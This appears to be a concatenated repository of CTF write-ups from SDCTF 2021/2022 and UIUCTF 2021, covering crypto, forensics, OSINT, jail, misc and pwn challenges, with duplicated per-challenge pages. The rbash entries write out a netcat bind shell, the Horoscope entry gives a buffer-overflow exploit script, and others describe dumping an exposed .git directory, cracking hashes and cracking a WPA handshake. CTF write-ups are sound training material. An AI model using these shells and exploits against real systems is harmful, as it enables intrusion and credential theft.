10 | tags: "web, twh"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | * The challenge hints at memory issues
19 | * we can enter an integer and the web app sends a reply
20 | * there are few checks which the web app makes:
21 |
22 | ```javascript
23 | if(!req.query.n) {
24 | res.status(400).send('Missing required parameter n');
25 | return;
26 | }
27 | ```
28 | * so `n` cannot be blank
29 |
30 | ```javascript
31 | const BUFFER_SIZE = 8;
32 |
33 | if(req.query.n.length > BUFFER_SIZE) {
34 | res.status(400).send('Requested n too large!');
35 | return;
36 | }
37 | ```
38 |
39 | * so max length of `n` can be `8`
40 | * the web app does not check for duplicate parameters, so we can send another n along with the first
41 |
42 | 
43 |
44 |
--------------------------------------------------------------------------------
/sdctf_2021/web/GitGood.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | Git Good Writeup
4 | desc: Check out our writeup for Git Good for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: web
9 | challenge: Git Good
10 | tags: "web, twh, git"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | * Robots reveal an `admin` page and `.git` directory
19 |
20 | 
21 |
22 | * I used a very useful tool which helps to dump file contents of websites which use GIT version control system
23 | * https://github.com/internetwache/GitTools
24 |
25 | * `.git` directory dumped :
26 |
27 | 
28 |
29 | * now we can use extractor to get files from the dump
30 |
31 | 
32 |
33 | * I found 2 `users.db` files, both are sqlite3 databases
34 | * one contains `bcrypt` hashes and other one contains `md5` hashes
35 | * I cracked md5 hashes first because they take less time
36 |
37 | 
38 |
39 | * one valid credential found :
40 |
41 | ```
42 | aaron@cgau.sdc.tf : weakpassword
43 | ```
44 |
45 | * login on `admin.html` and we get the flag
46 |
47 | 
--------------------------------------------------------------------------------
/sdctf_2022/README.md:
--------------------------------------------------------------------------------
1 | # SDCTF 2022
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Cryptography](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Jail](jail.md)
10 | * [Misc](misc.md)
11 | * [OSINT](osint.md)
12 | * [Pwn](pwn.md)
13 | * [Web](web.md)
--------------------------------------------------------------------------------
/sdctf_2022/crypto.md:
--------------------------------------------------------------------------------
1 | # crypto
2 |
3 | ## Vinegar
4 | > Solved by - Avantika(iamavu)
5 |
6 | ```
7 | Vinegar
8 | My friend gave me another encrypted flag...I think they hate me! I heard them yell something about “Vinegar”, but I still don’t know what they’re talking about!
9 |
10 | Ciphertext
11 | {wbeyrjgewcfroggpesremvxgvefyrcmnnymxhdacgnnrwprhxpuyyaupbmskjrxfopr}
12 |
13 | Note
14 | My friend also yelled something about “preventing plaintext attacks” and said once I’ve decrypted this, I’ll need to append sdctf to the front of it.
15 | ```
16 |
17 | As the name implies it is Vigenere cipher, we just need to bruteforce it.|
18 | I googled for Vigenere bruteforce and the first [tool](https://www.guballa.de/vigenere-solver) did the trick
19 | don’t forget to append `sdctf` in the beginning
20 |
21 | FLAG :
22 |
23 | ```
24 | sdctf{couldntuseleetstringsinthisonesadlybutwemadeitextralongtocompensate}
25 | ```
26 |
27 |
28 |
--------------------------------------------------------------------------------
/sdctf_2022/crypto/Vinegar.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Vinegar Writeup
4 | desc: Check out our writeup for Vinegar for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: crypto
9 | challenge: Vinegar
10 | tags: "crypto, ava, cipher"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by - Avantika(iamavu)
17 |
18 | ```
19 | Vinegar
20 | My friend gave me another encrypted flag...I think they hate me! I heard them yell something about “Vinegar”, but I still don’t know what they’re talking about!
21 |
22 | Ciphertext
23 | {wbeyrjgewcfroggpesremvxgvefyrcmnnymxhdacgnnrwprhxpuyyaupbmskjrxfopr}
24 |
25 | Note
26 | My friend also yelled something about “preventing plaintext attacks” and said once I’ve decrypted this, I’ll need to append sdctf to the front of it.
27 | ```
28 |
29 | As the name implies it is Vigenere cipher, we just need to bruteforce it.|
30 | I googled for Vigenere bruteforce and the first [tool](https://www.guballa.de/vigenere-solver) did the trick
31 | don’t forget to append `sdctf` in the beginning
32 |
33 | FLAG :
34 |
35 | ```
36 | sdctf{couldntuseleetstringsinthisonesadlybutwemadeitextralongtocompensate}
37 | ```
38 |
39 |
40 |
--------------------------------------------------------------------------------
/sdctf_2022/forensics/Susanalbumparty.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Susan album party Writeup
4 | desc: Check out our writeup for Susan album party for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: forensics
9 | challenge: Susan album party
10 | tags: "forensics, starry"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Starry-lord
18 |
19 | 
20 |
21 | We get the file stub and notice its a jpeg image. Since it was pretty heavy, and this image looks like its very low res, it was almost sure there were stuff hidden inside. When opened into a image editor such as gimp, we see the first part of the flag:
22 |
23 | 
24 |
25 | This hinted at magic bytes for jpg files FFD8. At this point I turned the file to hex and looked for ffd8:
26 |
27 | 
28 |
29 | and found three files like that:
30 |
31 | 
32 |
33 | 
34 |
35 | 
36 |
37 | ```
38 | sdctf{FFD8_th3n_SOME_s7uff_FFD9} 'some' with a zero
39 | ```
40 |
--------------------------------------------------------------------------------
/sdctf_2022/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | SDCTF 2022
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | ---
--------------------------------------------------------------------------------
/sdctf_2022/jail.md:
--------------------------------------------------------------------------------
1 | # jail
2 |
3 | ## rbash warmup
4 | > Solved By : thewhiteh4t
5 |
6 | we can use `compgen` to check for available commands
7 |
8 | ```
9 | compgen -c
10 | ```
11 |
12 | 
13 |
14 |
15 | another way is to use `echo`
16 |
17 |
18 | 
19 |
20 |
21 | now the known way of escaping with `nc` is by getting a shell on our “attacker” box but in this challenge we are not allowed to connect to remote machines so we are left with localhost
22 |
23 | actually this is more easy…
24 |
25 | ```
26 | nc -lvp 4444 -e /bin/sh &
27 | ```
28 |
29 | 
30 |
31 |
32 | now we can connect to it !
33 |
34 |
35 | 
36 |
37 | ----------
38 |
39 |
40 | ## rbash yet another calculator
41 | > Solved By : thewhiteh4t
42 |
43 | challenge mentions that filename has been changed this time but it is in the same working directory
44 |
45 | so we can again use echo to check the file name
46 |
47 | 
48 |
49 |
50 | just google “echo read file”
51 |
52 |
53 | 
54 |
--------------------------------------------------------------------------------
/sdctf_2022/jail/rbashwarmup.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | rbash warmup Writeup
4 | desc: Check out our writeup for rbash warmup for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: jail
9 | challenge: rbash warmup
10 | tags: "jail, twh, rbash, escape"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | we can use `compgen` to check for available commands
19 |
20 | ```
21 | compgen -c
22 | ```
23 |
24 | 
25 |
26 |
27 | another way is to use `echo`
28 |
29 |
30 | 
31 |
32 |
33 | now the known way of escaping with `nc` is by getting a shell on our “attacker” box but in this challenge we are not allowed to connect to remote machines so we are left with localhost
34 |
35 | actually this is more easy…
36 |
37 | ```
38 | nc -lvp 4444 -e /bin/sh &
39 | ```
40 |
41 | 
42 |
43 |
44 | now we can connect to it !
45 |
46 |
47 | 
48 |
49 |
--------------------------------------------------------------------------------
/sdctf_2022/jail/rbashyetanothercalculator.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | rbash yet another calculator Writeup
4 | desc: Check out our writeup for rbash yet another calculator for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: jail
9 | challenge: rbash yet another calculator
10 | tags: "jail, twh, rbash, escape"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : thewhiteh4t
19 |
20 | challenge mentions that filename has been changed this time but it is in the same working directory
21 |
22 | so we can again use echo to check the file name
23 |
24 | 
25 |
26 |
27 | just google “echo read file”
28 |
29 |
30 | 
31 |
--------------------------------------------------------------------------------
/sdctf_2022/misc.md:
--------------------------------------------------------------------------------
1 | # misc
2 |
3 | ## Ishihara test++
4 | > Solved by: Taz34
5 |
6 | Convert the image to PNG format, run it through stegsolve and change color planes multiple times till it gets readable.
7 |
8 | 
9 |
10 | And here is the ```flag: sdctf{c0untle55_col0rfu1_c0lors_cov3ring_3veryth1ng}```
11 |
12 | ----------
13 |
14 | ## Bishop Duel
15 | > Solved by: Taz34
16 |
17 | We have a chess board and we are playing as a white bishop and opponent as a black bishop.
18 | So for us to lose or win this game we need to be running our bishop on the same color, i.e. as in the image below we can see the opponent ‘BB’ can move on ‘__’ spaces and we ‘WW’ can move on ‘\\\\’ spaces, so we need our bishop to move on ‘__’ spaces.
19 |
20 | 
21 |
22 | So for that we need to get out of the board and there are tow ways out of the board i.e. the top right corner or the bottom left corner.
23 | So, I decided to move out of the top right.
24 | I used C1 then E2 and then we landed on a ‘__’ space.
25 |
26 | 
27 |
28 | Now just get in the way of the opponent to lose to get the flag.
29 |
30 | 
31 |
32 | ```
33 | Flag: sdctf{L0SiNG_y0uR_S0uRC3_C0d3_sUcKs}
34 | ```
--------------------------------------------------------------------------------
/sdctf_2022/misc/BishopDuel.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Bishop Duel Writeup
4 | desc: Check out our writeup for Bishop Duel for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: misc
9 | challenge: Bishop Duel
10 | tags: "misc, taz"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Taz34
18 |
19 | We have a chess board and we are playing as a white bishop and opponent as a black bishop.
20 | So for us to lose or win this game we need to be running our bishop on the same color, i.e. as in the image below we can see the opponent ‘BB’ can move on ‘__’ spaces and we ‘WW’ can move on ‘\\\\’ spaces, so we need our bishop to move on ‘__’ spaces.
21 |
22 | 
23 |
24 | So for that we need to get out of the board and there are tow ways out of the board i.e. the top right corner or the bottom left corner.
25 | So, I decided to move out of the top right.
26 | I used C1 then E2 and then we landed on a ‘__’ space.
27 |
28 | 
29 |
30 | Now just get in the way of the opponent to lose to get the flag.
31 |
32 | 
33 |
34 | ```
35 | Flag: sdctf{L0SiNG_y0uR_S0uRC3_C0d3_sUcKs}
36 | ```
--------------------------------------------------------------------------------
/sdctf_2022/misc/Ishiharatest.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Ishihara test++ Writeup
4 | desc: Check out our writeup for Ishihara test++ for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: misc
9 | challenge: Ishihara test++
10 | tags: "misc, taz, stegano"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | Convert the image to PNG format, run it through stegsolve and change color planes multiple times till it gets readable.
19 |
20 | 
21 |
22 | And here is the ```flag: sdctf{c0untle55_col0rfu1_c0lors_cov3ring_3veryth1ng}```
23 |
24 |
--------------------------------------------------------------------------------
/sdctf_2022/osint/GoogleRansom.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Google-Ransom Writeup
4 | desc: Check out our writeup for Google-Ransom for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: osint
9 | challenge: Google-Ransom
10 | tags: "osint, ava, starry"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Avantika (iamavu) and Starry-Lord
18 |
19 | ```
20 | Google Ransom
21 | Oh no! A hacker has stolen a flag from us and is holding it ransom. Can you help us figure out who created this document? Find their email address and demand they return the flag!
22 |
23 | Ransom Letter - https://docs.google.com/document/d/1MbY-aT4WY6jcfTugUEpLTjPQyIL9pnZgX_jP8d8G2Uo/edit
24 | ```
25 |
26 | We can find the owner of any drive file via google API, simply query the fileID which is present in the URL itself
27 | https://developers.google.com/drive/api/v3/reference/files/get
28 |
29 | 
30 |
31 | the `*` tells to print all possible fields in the metadata, we get the email as `amy.sdctf@gmail.com` send them a email and we get back our flag
32 |
33 | FLAG - `sdctf{0p3n_S0uRCE_1S_aMaz1NG}`
34 |
35 |
--------------------------------------------------------------------------------
/sdctf_2022/osint/Partoftheship.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Part of the ship Writeup
4 | desc: Check out our writeup for Part of the ship for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: osint
9 | challenge: Part of the ship
10 | tags: "osint, ava, starry"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Avantika(iamavu) and Starry-Lord
18 |
19 | ```
20 | Part of the ship...
21 | Sometimes I worry about my friend... he's way too into memes, he's always smiling, and he's always spouting nonsense about some "forbidden app." I don't know what he's talking about, but maybe you can help me figure it out! All I know is a username he used way back in the day. Good luck! Flag format is sdctf{flag}
22 |
23 | Username
24 | DanFlashes
25 | ```
26 |
27 | “smiling” and “app”, reminded me of iFunny , I went to https://ifunny.co/user/DanFlashes
28 | but it gave a 404, so first thing usually which I do is check on wayback machine and boom, we got our flag
29 | https://web.archive.org/web/20220128003432/https://ifunny.co/user/DanFlashes
30 |
31 | FLAG - `sdctf{morning_noon_and_night_I_meme}`
32 |
33 | Additional details:
34 |
35 | https://ifunny.co/picture/top-definition-part-of-the-ship-part-of-the-crew-LKPb8Zjx7
36 |
37 |
--------------------------------------------------------------------------------
/sdctf_2022/osint/Samuel.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Samuel Writeup
4 | desc: Check out our writeup for Samuel for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: osint
9 | challenge: Samuel
10 | tags: "osint, ava, starry"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : Avantika(iamavu) and Starry-Lord
18 |
19 | 
20 |
21 | We have a youtube video https://www.youtube.com/watch?v=fDGVF1fK1cA. We can see a blurry video, with a beacon going on and off in the night, with what seems like cable-cars or planes in the distance. Short light and long lights seemed like morse code. Here's the decoded morse.
22 |
23 | ```
24 | WHWHWHGODWROUGHT
25 | ```
26 |
27 | https://www.history.com/.amp/this-day-in-history/what-hath-god-wrought
28 |
29 | According to the link, Samuel Morse demonstrated the telegraph in 1844 with the sentence "what had God wrought".
30 |
31 | So we are looking for a beacon that sends the message in morse code, and I found this https://sculpturemagazine.art/mixed-messages-mark-bradfords-what-hath-god-wrought/
32 |
33 | Avantika then found the location for this place on Google maps.
34 | https://www.google.com/maps/place/What+Hath+God+Wrought/@32.8752134,-117.2429636,17z/data=!3m1!4b1!4m5!3m4!1s0x80dc07e0d30e81a7:0x69087278617d6b1d!8m2!3d32.8752134!4d-117.2407749
35 |
36 | ```
37 | sdctf{32.875,-117.240}
38 | ```
39 |
40 |
--------------------------------------------------------------------------------
/sdctf_2022/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## Horoscope
4 | > Solved by: Taz34
5 |
6 | Here we have a binary so the first thing i started to look for is to get a segmentation fault and we got it.
7 |
8 |
9 | 
10 |
11 |
12 | Now I started looking for offset so the offset multiple to be added is 42
13 | i.e.
14 |
15 |
16 | python3 -c "print('10/10/1999/10:' + '1'*42)"
17 | Hence the payload is: 10/10/1999/10:111111111111111111111111111111111111111111
18 |
19 | Now we started looking at Ghidra, and we found a function “test” from which we can get a shell on target.
20 |
21 | 
22 |
23 |
24 | here we have a problem that we need to make this (temp == 1) conditon true.
25 | So, after going to other functions we found another function “debug”
26 |
27 | 
28 |
29 |
30 | Now we can construct the final payload as:
31 |
32 | payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + debug_fun_addr + test_fun_addr
33 |
34 | hence the final script:
35 |
36 | from pwn import *
37 |
38 | p = remote("horoscope.sdc.tf", 1337)
39 |
40 | payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + p64(0x40096e) +p64(0x400950)
41 |
42 | p.sendline(payload)
43 |
44 | p.interactive()
45 |
46 | now just execute this script to get the flag
47 |
48 | 
49 |
50 | Flag: sdctf{S33ms_y0ur_h0rO5c0p3_W4s_g00d_1oD4y}
51 |
52 |
--------------------------------------------------------------------------------
/uiuctf_2021/README.md:
--------------------------------------------------------------------------------
1 | # UIUCTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Crypto](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Misc](misc.md)
10 | * [OSINT](osint.md)
11 | * [Pwn](pwn.md)
--------------------------------------------------------------------------------
/uiuctf_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | UIUCTF 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | ---
--------------------------------------------------------------------------------
/uiuctf_2021/misc.md:
--------------------------------------------------------------------------------
1 | # misc
2 |
3 | ## CEO
4 | > Solved by : thewhiteh4t
5 |
6 | - We have a `.cap` file in this challenge
7 | - its a handshake file which can be used with `aircrack-ng`
8 |
9 |
10 | aircrack-ng megacorp-01.cap -w /usr/share/wordlists/rockyou.txt
11 |
12 |
13 | 
14 |
15 |
16 |
17 | uiuctf{nanotechnology}
18 |
19 |
20 | ----------
21 |
22 | ## doot doot
23 | > Solved by : thewhiteh4t
24 |
25 |
26 | - we are given a youtube video which is 8hrs 52mins long
27 | - bee movie script is looping
28 | - flag appears in the scrolling text at 9:55
29 | - https://youtu.be/zNXl9fqGX40?t=595
30 |
31 |
32 | 
33 |
34 |
35 | `uiuctf{doot_d0ot_do0t_arent_you_tired_of_the_int4rnet?}`
36 |
37 | ----------
38 |
39 | ## Emote
40 | > Solved by : Starry-Lord
41 |
42 | Challenge mentions sharing images on discord, so I checked uiuctf 's discord and found a suspicious emoji:
43 |
44 |
45 | 
46 |
47 |
48 | Use zsteg on the png to read flag:
49 |
50 |
51 | uiuctf{staring_at_pixels_is_fun}
52 |
53 |
--------------------------------------------------------------------------------
/uiuctf_2021/misc/CEO.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | CEO Writeup
4 | desc: Check out our writeup for CEO for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: misc
9 | challenge: CEO
10 | tags: "misc, twh, aircrack"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 | - We have a `.cap` file in this challenge
19 | - its a handshake file which can be used with `aircrack-ng`
20 |
21 |
22 | aircrack-ng megacorp-01.cap -w /usr/share/wordlists/rockyou.txt
23 |
24 |
25 | 
26 |
27 |
28 |
29 | uiuctf{nanotechnology}
30 |
31 |
32 |
--------------------------------------------------------------------------------
/uiuctf_2021/misc/Emote.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Emote Writeup
4 | desc: Check out our writeup for Emote for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: misc
9 | challenge: Emote
10 | tags: "misc, starry"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 | Challenge mentions sharing images on discord, so I checked uiuctf 's discord and found a suspicious emoji:
19 |
20 |
21 | 
22 |
23 |
24 | Use zsteg on the png to read flag:
25 |
26 |
27 | uiuctf{staring_at_pixels_is_fun}
28 |
29 |
--------------------------------------------------------------------------------
/uiuctf_2021/misc/dootdoot.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | doot doot Writeup
4 | desc: Check out our writeup for doot doot for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: misc
9 | challenge: doot doot
10 | tags: "misc, twh"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - we are given a youtube video which is 8hrs 52mins long
20 | - bee movie script is looping
21 | - flag appears in the scrolling text at 9:55
22 | - https://youtu.be/zNXl9fqGX40?t=595
23 |
24 |
25 | 
26 |
27 |
28 | `uiuctf{doot_d0ot_do0t_arent_you_tired_of_the_int4rnet?}`
29 |
30 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare1.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 1 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 1 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 1
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie Chaplin has gotten into software development, coding, and the like... He made a company, but it recently came under fire for a PR disaster. He got **all over the internet** before he realized the company's mistake, and is now scrambling to clean up his mess, but it may be too late!! Find his Twitter Account and investigate! *NOTE THAT THESE CHALLENGES DO NOT HAVE DO BE DONE IN ORDER!”*
19 |
20 | search “Chaplin Chaplin Coding” on twitter and you will get one result
21 |
22 | https://twitter.com/ChaplinCoding
23 |
24 | Now go to the “view lists” under the three dots next to follow (You need an account to see it)
25 |
26 | You’ll find the flag in the second list
27 | https://twitter.com/i/lists/1416876734578929664
28 |
29 |
30 | Flag: uiuctf{pe@k_c0medy!}
31 |
32 |
33 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 2 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 2 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 2
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie made an advertisement to promote his company, he is using the modern media platform YouTube to present it! Can you find it?”
19 |
20 | Searching up “Charlie Chaplin Coding” on google shows up this channel or the link is given from the previous challenge twitter account
21 |
22 | https://www.youtube.com/channel/UCxPyHVMa8TyKrOj05x86osA
23 |
24 | Click on the only video there and there will be the flag at almost the end of the video
25 |
26 | 
27 |
28 |
29 |
30 | flag: uiuctf{ch@plin_oN_th3_tV!!}
31 |
32 |
33 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare3.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 3 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 3 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 3
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie even has a website!!! Find it and look around!
19 | The inner content of this flag begins with **"ch"**”
20 |
21 | Under the **youtube “about”** page from above you’ll get the link to their website
22 |
23 |
24 | https://www.charliechaplin.dev/home
25 |
26 |
27 | Scroll down on the home page and you’ll see an album of 3 pictures of charlie
28 | If you look closely on the picture of charlie with a macintosh, you’ll get the flag
29 | https://lh4.googleusercontent.com/qa6GoXttPCeo63Stxl8lJUNzxXZQ-TEac2HGMLKDsd1h3pEoE6MvQCS1ZdZ-x41n2mP398ke75tKKAg1B5w6niI=w16383
30 |
31 |
32 | Flag: uiuctf{ch@pl1n_i5_eL337}
33 |
34 |
35 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare4.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 4 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 4 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 4
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie left another flag on his company's website. Maybe you have to reach out to him???
19 | The inner content of this flag begins with **"w3"”**
20 |
21 | under the **contact** page you’ll see a google form to fill
22 |
23 |
24 | https://docs.google.com/forms/d/e/1FAIpQLScpLDShOWwi3gQb12RfViHuVZR-__L5p8vIAQVQ6eczQULN3Q/viewform
25 |
26 |
27 | Just submit the form (can be empty) and you’ll get the flag
28 |
29 |
30 | Flag: uiuctf{w3_d0_nOt_v@lu3_yoUR_1nPuT}
31 |
32 |
33 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare5.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 5 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 5 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 5
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie also has an imgur account that may hold the secret to his PR nightmare... Can you find it?
19 | The inner content of this flag begins with **"tH"** ”
20 |
21 | Under the same website, Go to the **about us** page
22 | The last image there is actually uploaded from imgur
23 |
24 |
25 | https://imgur.com/a/iZI1ov4
26 |
27 |
28 | Go to their profile and check out their comment history
29 | Flag is in the first ever comment
30 |
31 |
32 | https://imgur.com/user/chaplindevelopment/comments
33 |
34 |
35 |
36 | Flag: uiuctf{tH3_pR_p0Lic3_h@vE_cAugHt_Up?!}
37 |
38 |
39 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare6.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 6 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 6 for Uiuctf 2021 capture the flag competition.
